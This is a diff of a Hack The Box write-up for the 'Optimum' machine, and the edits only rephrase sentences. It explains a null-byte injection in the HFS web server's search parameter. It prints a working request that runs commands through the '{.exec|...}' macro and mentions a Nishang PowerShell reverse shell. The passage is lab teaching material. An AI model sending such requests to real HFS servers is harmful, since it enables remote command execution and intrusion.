Kyuu-Ji/htb-write-up/optimum/write-up-optimum.md

 ### Explaining and using the exploit

 The HFS application has an internal scripting language that uses some characters like curly brackets, pipe symbols and dots.
 It has a regular expression that searches and replaces these characters in the Search parameter.
-When we send a _NULL Byte_ in the Search query, this will terminate the regular expression but everything after the NULL Byte will not be replaced.
+When sending a _NULL Byte_ in the Search query, this will terminate the regular expression but everything after the NULL Byte will not be replaced.

-Before we can do this, we need to know which characters to send.
-We can find that out by reading the [Rejetto wiki](https://rejetto.com/wiki/index.php?title=HFS:_scripting_commands).
+Before doing this, we need to know which characters to send.
+This can be found out by reading the [Rejetto wiki](https://rejetto.com/wiki/index.php?title=HFS:_scripting_commands).
 The parameter **exec** is what we need to send to execute commands.
 ```markdown
 Example: {.exec|notepad.}
 ```

 Lets send a request with **%00** in the search bar, to _Burpsuite_ and modify the requests in the **Repeater**.
-For testing we can send a simple `ping` command to verify that it works the way we want it to:
+For testing we can send a simple `ping` command to verify that it works the correct way:
 ```markdown
 GET /?search=%00{.exec|ping 10.10.14.23.} HTTP/1.1
 ```

 The `tcpdump` on my local machine waits for connections and after sending this request it outputs the ICMP packets.
-We have command execution and can start a reverse shell on this box.
+This means successful command execution and we can start a reverse shell on this box.

 For this task I will use the Powershell script **Invoke-PowerShellTcp.ps1** from the **Nishang Framework** that will listen on my IP and port 9001.
 ```markdown